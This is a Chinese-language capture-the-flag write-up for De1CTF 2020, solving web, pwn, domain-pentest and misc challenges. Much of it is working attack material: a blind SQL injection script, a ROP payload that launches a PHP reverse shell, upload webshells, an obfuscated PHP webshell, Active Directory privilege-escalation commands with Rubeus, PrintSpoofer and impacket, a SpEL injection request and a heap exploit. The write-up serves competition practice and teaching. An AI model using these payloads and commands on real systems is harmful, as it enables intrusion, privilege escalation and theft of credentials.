mixture
解题思路
<!------ Include the above in your HEAD tag ---------->
任何帐号密码都可以登录进去,看看功能点
http://134.175.185.244/member.php?orderby=5
过滤了& || if regexp ^ length union sleep hex unhex desc exp updatexml extractvalue
注入脚本
import requests
flag=''
cookies={'PHPSESSID':'cecvck53t45qs8nu85bh9d119r'}
url="http://49.51.251.99//member.php?orderby="
page=requests.get(url,cookies=cookies).text
for i in range(1,33):
for j in '0123456789abcdefghijklmnopqrstuvwxyz,':
payload="|(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1)='{}')%2b1".format(i,j)
true_url=url+payload
r=requests.get(true_url,cookies=cookies)
if r.text!=page:
print payload+' ok'
flag+=j
print flag
else:
print payload
账号admin 密码goodlucktoyou
拿到1.elf文件
search处可以得到源码
//index.php
<?php
error_reporting(0);
include "config.php";
session_start();
if(!empty($_SESSION['user'])){
header("location: /profile.php");
}
session_start();
$username = $_POST['username'];
$password = $_POST['password'];
if(!empty($username)&&!empty($password)){
if($username==='admin')
{
$sql = "select password from member";
$result = $mysqli->query($sql);
$row = $result->fetch_row();
if($row[0]===md5($password)){
$_SESSION['user']='admin';
$_SESSION['admin']=1;
header("location: /profile.php");
}
else{
echo "<script>alert('nononon,admin password not right')</script>";
}
}
else{
$_SESSION['user']='guest';
$_SESSION['admin']=0;
header("location: /profile.php");
}
}
?>
//admin.php
<?php
include "profile.php";
session_start();
if(empty($_SESSION['user'])){
header("location: index.php");
}
if($_SESSION['admin']==1){
phpinfo();
}
else{
print <<<EOT
<div class="row">
<div class="col-md-6 col-md-offset-4">You are not admin!!!!</div>
</div>
EOT;
}
//member.php
<?php
include "profile.php";
include "config.php";
$orderby = $_GET['orderby'];
?>
<?php
print <<<EOT
<div class="table-responsive">
<table class="table">
<!--orderby-->
<caption>ALLmember</caption>
<thead>
<tr>
<th>id</th>
<th>username</th>
<th>money</th></tr>
</thead>
<tbody>
EOT;
if(!empty($orderby)){
$blacklist = "/if|desc|sleep|rand|updatexml|^|union||||&&|regexp|exp|extractvalue|length|hex/i";
if(preg_match($blacklist, $orderby))
exit("No~~hacker!");
$sql = "SELECT * FROM users order by id ".$orderby;
$result = $mysqli->query($sql);
if($result===false){
$sql="SELECT * FROM users";
}
}
else{
$sql = "SELECT * FROM users";
}
$result = $mysqli->query($sql);
/* free result set */
while($row = $result->fetch_row()){
//var_dump($row);
print <<<EOT
<tr>
<td>$row[0]</td>
<td>$row[1]</td>
<td>$row[2]</td></tr>
<tr>
EOT;
}
$result->free();
$mysqli->close();
print <<<EOT
</tbody>
</table>
</div>
EOT;
?>
pwn_exp.py
#!/usr/bin/env python2
# -*- coding:utf-8 -*-
"""
Author : Kirin
Date : 2020/05/04, 04:31
"""
import requests
import sys
import os
from pwn import *
libc_addr = 0x7f546eacb000 # libc address
shell_addr = 0x7ffd5b5ab000 # stack
pop_rdi = libc_addr+0x023a5f
mov_rdx_rdi = libc_addr+0xddc2a
pop_rdx = libc_addr+0x106725
s = "php -r '$sock=fsockopen("xxxxx",9981);exec("/bin/bash -i <&3 >&3 2>&3");'x00"
pop4_ret = libc_addr+0x0000000000024568
payload = p64(pop_rdx)*10+p64(pop4_ret)+p64(0)*4
for i in range(len(s)/8+1):
payload += p64(pop_rdx)
payload += p64(shell_addr+i*8)
payload += p64(pop_rdi)
payload += s[i*8:i*8+8].ljust(8, "x00")
payload += p64(mov_rdx_rdi)
payload += p64(pop_rdi)+p64(shell_addr)
payload += p64(libc_addr+0x0449c0)
def local():
global INITIAL
filename = "a"*0x88+payload
data = {
"x": filename,
}
url = "http://127.0.0.1:8087"
r = requests.post(url, params=data)
print r.content
def remote():
global INITIAL
filename = "a"*0x88+payload
data = {
"search": filename,
}
url = "http://134.175.185.244/select.php"
r = requests.post(url, data=data, cookies={
"PHPSESSID": "5eatvn82eb51nhkc7vj7j12ud1"})
print r.content
remote()
readflag.php
<?php
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/tmp/.orzzzzz", "a"),
);
$process = proc_open("/readflag", $descriptorspec, $pipes, "/", array());
if (is_resource($process)) {
$descriptorspec = fread($pipes[1], 1024);
$descriptorspec = fread($pipes[1], 1024);
var_dump($descriptorspec);
$ccc = explode("n", $descriptorspec)[0];
var_dump($ccc);
eval("$result = $ccc;");
print_r("$result = $ccc;");
print_r($result);
fwrite($pipes[0], "$resultn");
var_dump(fread($pipes[1], 1024));
var_dump(fread($pipes[1], 1024));
var_dump(fread($pipes[1], 1024));
fclose($pipes[0]);
fclose($pipes[1]);
$return_value = proc_close($process);
}
perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!
考点推测是.htaccess getshell,绕一下过滤,上传.htaccess文件后uploads的对应目录会500
Content-Disposition: form-data; name="fileUpload"; filename="xx.txt"
Content-Type: image/jpeg
<?=`$_GET[1]`;
xx.txt?1=cat /flag;
其他payload
Content-Disposition: form-data; name="fileUpload"; filename=".htaccess"
Content-Type: image/jpeg
AddType application/x-httpd-p
hp .qiu
Content-Disposition: form-data; name="fileUpload"; filename="1.qiu"
Content-Type: image/jpeg
<?=eval($_POST[1]);
Hard_Pentest_1
shell:
<?=$_=[]?>
<?=$_="$_"?>
<?=$_=$_['!'=='@']?>
<?=$___=$_?>
<?=$__=$_?>
<?=$__++?><?=$__++?>
<?=$__++?><?=$__++?>
<?=$____=$__++?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$_____________=$__++?><?=$__++?>
<?=$__________=$__++?>
<?=$_________=$__++?>
<?=$__++?>
<?=$________=$__++?>
<?=$_____=$__++?>
<?=$______=$__++?>
<?=$______?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?=$____________=$__++?>
<?=$_____.$____________.$_____.$______.$____.$_____________?>
<?=$________________=$_____.$____________.$_____.$______.$____.$_____________?>
<?=$_________.$__________.$_____.$______?>
<?=($________________)(${'_'.$_________.$__________.$_____.$______}{!!'@'})?>
拿到shell以后发现时域内机器,扫描域控的共享,查看共享得知几个目录
在Hint里找到一个zip,但是有密码
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}"><Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/></User>
</Groups>
之后再SYSVOL中找到策略的密码,解密之后即为zip密码
https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/
C:webuploadsline> net group /domain
The request will be processed at a domain controller for domain De1CTF2020.lab.
Group Accounts for \dc.De1CTF2020.lab
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed successfully.
非预期提权
PrintSpoofer.exe -c "cmd.exe /c net user line LINEline123.. /ad"
预期提权
利用Kerberoasting获取到delta用户的哈希,之后进行本地爆破即可获得密码
根据bloodhound可以看到delta用户对dm主机可以进行写操作
于是就可以给dm委派delta为管理员
首先查看delta用户的sid
得到delta的sid为 S-1-5-21-1806179181-549835139-1294087714-1106
之后修改dm的委派,允许delta用户操作dm
O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1806179181-549835139-1294087714-1106)
此处我先使用PS脚本但是没跑通,猜测可能是当前权限为web的原因
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1806179181-549835139-1294087714-1106)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dm| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
然后使用Rubeus获取密码哈希,也可以使用之前抓到的哈希
Rubeus.exe hash /user:de1ta /password:3f23ea12 /domain:DE1CTF2020.LAB
然后使用哈希生成访问smb的白银票据,需要分别生成cifs服务和host服务两个的票据
Rubeus.exe s4u /user:de1ta /rc4:B03094996601324646AC223BF30D0D07 /impersonateuser:administrator /msdsspn:cifs/dc /ptt
Rubeus.exe s4u /user:de1ta /rc4:B03094996601324646AC223BF30D0D07 /impersonateuser:administrator /msdsspn:host/dc /ptt
查看生成的票据
klist
之后使用impacket生成delta的访问凭据
getST.py -dc-ip 192.168.0.12 -spn cifs/dm -impersonate administrator De1CTF2020.lab/de1ta:3f23ea12
有了票据以后,使用这个票据即可获得最高权限
psexec.py de1ta:3f23ea12@192.168.0.11
原本考的是dcshadow
不过似乎有人已经完成了权限的同步,导致delta权限直接就是域管,直接上车,真香
涉及工具
https://github.com/GhostPack/Rubeus
https://github.com/SecureAuthCorp/impacket/
https://github.com/PowerShellMafia/PowerSploit 注意使用dev分支
cobalt strike
msf
参考资料
https://xz.aliyun.com/t/7454
http://blog.nsfocus.net/analysis-attacks-entitlement-resource-constrained-delegation/
https://www.secpulse.com/archives/70892.html
http://www.labofapenetrationtester.com/2018/04/dcshadow.html
calc
解题思路
el表达式注入:
GET /spel/calc?calc=neW+java.util.Scanner(neW+java.io.File('/flag')).next() HTTP/1.1
Host: 106.52.164.141
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Referer: http://106.52.164.141/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Misc杂烩
解题思路
流量包里有几张图片
要分离出唯一的一个png文件
找到一个云盘地址
https://drive.google.com/file/d/1JBdPj7eRaXuLCTFGn7AluAxmxQ4k1jvX/view
可以下载一个word文件
word文件中藏了一个压缩包需要密码
word中还有两张图
爆破压缩包,六位 DE开头
爆破得到: DE34Q1
binwalk分离一下:发现有一个压缩包,里面又文件666.jpg:fffffffflllll.txt 为flag
mc_joinin
解题思路
nmap 扫描之后发现服务器版本为20.20, 协议版本为997, mc连接服务器过程中会向服务器发送自己的协议版本, 目前mc最高版本1.15.2,协议版本为 578, 所以题目思路为伪造 mc 版本
使用 https://github.com/Tnze/go-mc 这个库, 将其 bot/mcbot.go 中 ProtocolVersion 变量改为 997, 然后引包, 连接:
func main() {
c := bot.NewClient()
err := c.JoinServer("222.85.25.41", 25565)
if err != nil {
log.Fatal(err)
}
log.Println("Login success")
}
wireshark抓包即可看到
"text":"nnHIDE FLAG ONEnn imgur.com/a/ZOrErVM nn"
进入该地址得到一张图片, 经 F11st 师傅提醒, 在 ps 中打开, 调至红色通道即可
life
解题思路
分离出一张图
一个压缩包需要密码
生命游戏了解一下https://blog.csdn.net/u011439689/article/details/17226237
已经撸上去了。地址和数据如下,导入使用中以上尺寸,放置在中心位置
https://funnyjs.com/jspages/game-of-life.html
#N Temp data by Javascript Robot
x = 27,y = 27, rule = 23/3
13bo2$2bo10bo$5bobo2bobo4bo2bob2o$3b2obob2o2bob4ob2o2bo$3bobobobobo5bob
2obo$bobo5bo5b2o7bo$3b2obob2ob2o2bobobo2bo$3bobobobobob2o2b2ob2o2bo$4b
obobo4bo3bo2b2obo$3bo5bob2o2b2o7b3o$7b4o3bob2o2b2ob2obo$2bobo2bo6bo3b2o5b
o$5b3o2bob2o3bo2b2obob2o$2bobo2b2ob2o3bo6bo2b2o$3bob4o3b2obo2b4o3bo$5b
2o6b2o2bobobobob2o$4bo2b2o2b3o2bobobob2ob2o$2b2o4b2o2bobo4bo3bo2bo$6bo2b
obo3bob2o6b2o$3o2b2o2bo2b2o3bo2b4ob2o$b3o2bo3bob3obo3bobo2bo$o7bo3bo4b
2obo2bob2o$o2bo6bo2bo4b2o4b2o$obob4obo2b7o2b2o2bo$o3b7ob2ob2o2b7o$2bo2b
o4b4o2b3obobo2b2o$!
单步一轮以后
扫描之后密码为AJTC8ADEVRA13AR 解开压缩包内容为
0QjN1MTM0MTN0QjN3ImNjNzM3QTNmdTN3MTNmdzMzcjNxcjM3QTNmdDN2gzMzUjZ2czM0YDZzMjMxcDZ
丢到cyberchef
easy_bgm
解题思路
访问网站下载背景音乐bgm.mp3
尝试了各种隐写都不行。偶然看到得知一种private位隐写
参考资料https://www.cnpanda.net/ctf/342.html
尝试之后获取到一些数据
import re
import binascii
n = 0x28a3
result = ''
file = open('bgm.mp3','rb')
file.seek(n, 0)
def w(s):
with open("1.txt", "a+") as f:
f.write(s + "n")
for i in range(0, 3284):
frame_hdr = file.read(4)
hex_data = binascii.b2a_hex(frame_hdr).decode("utf8")
bin_data = bin(int("0x" + hex_data,16)).replace("0b", "")
w(bin_data)
n += 0x1a1
file.seek(n, 0)
生成1.txt之后用vscode打开多行编辑选中第24比特复制出来,然后计算长度,选择最靠近的长度为336bit,多余的0删掉。得到
101111101000010010101110011010101000001001010110110011000010001011111010001000101000110001001110000011001110101011111010001011100110001000101100010010101100001011001100111011001001011010110010111110100000110000101110111110101100110010110110000011001100011010001100110011001110101011011110011000100010101011000010100011001010011000100010
反转得到
010001000110010100110001010000110101010001000110011110110101011100110011001100010110001100110000011011010011001101011111011101000011000001011111010011010110100100110111001100110100001101010010001101000100011001110100010111110101011100110000011100100011000101000100010111110100010000110011011010100100000101010110011101010010000101111101
直接转ascii得到flag
stl_container
解题思路:
from PwnContext import *
from pwn import *
from LibcSearcher import *
#context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
s = lambda data :ctx.send(str(data)) #in case that data is an int
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
# misc functions
uu32 = lambda data :u32(data.ljust(4, 'x00'))
uu64 = lambda data :u64(data.ljust(8, 'x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
ctx.binary = 'stl_container'
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
local=0
def choice():
if(local):
p=rs()
else:
ctx.remote = ('134.175.239.26',8848)
p=rs('remote')
return p
def debug():
if(local==1):
libc_base = ctx.bases.libc
print hex(libc_base)
ctx.symbols = {'sym1':0xEDA , 'sym2':0x10AF}
ctx.breakpoints = [0xEDA,0x10AF]
ctx.debug()
def menu(index):
sla(">> ",index)
def submenu(index):
sla(">> ",index)
def List(index,tpe,data):
menu(1)
submenu(tpe)
if tpe== 1:
sa("input data:",data)
if tpe== 2:
sla("index?",index)
if tpe== 3:
sla("index?",index)
def Vector(index,tpe,data):
menu(2)
submenu(tpe)
if tpe== 1:
sa("input data:",data)
if tpe== 2:
sla("index?",index)
if tpe== 3:
sla("index?",index)
def Queue(index,tpe,data):
menu(3)
submenu(tpe)
if tpe== 1:
sa("input data:",data)
if tpe== 3:
sla("index?",index)
def Stack(index,tpe,data):
menu(4)
submenu(tpe)
if tpe== 1:
sa("input data:",data)
if tpe== 3:
sla("index?",index)
choice()
Vector(1,1,"f"*0x10+p64(0xa0))
Vector(1,1,"f"*0x10+p64(0xa0))
List(1,1,"w"*0x10+p64(0xa0))
Vector(0,2,0)
Vector(0,2,0)
Vector(0,1,"xf0")
Vector(0,3,0)
ru("data: ")
heap_base=uu64(r(6))-0x125e0
leak("heap_base",heap_base)
Queue(0,1,p64(heap_base))
Queue(0,1,p64(0)+p64(7)+p64(0)*1+p64(0xa0)+p64(heap_base+0x20)+p64(0)*11+p64(heap_base+0x20))
Vector(0,3,0)
ru("data: ")
libc_base=uu64(r(6))-(0x7ffff77d7ca0-0x7ffff73ec000)
leak("libc_base",libc_base)
free_hook=libc_base+libc.symbols['__free_hook']
system=libc_base+libc.symbols['system']
List(1,1,p64(free_hook))
Stack(0,1,p64(system))
Vector(0,1,"/bin/shx00")
debug()
irt()
本文作者:ChaMd5安全团队
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/130490.html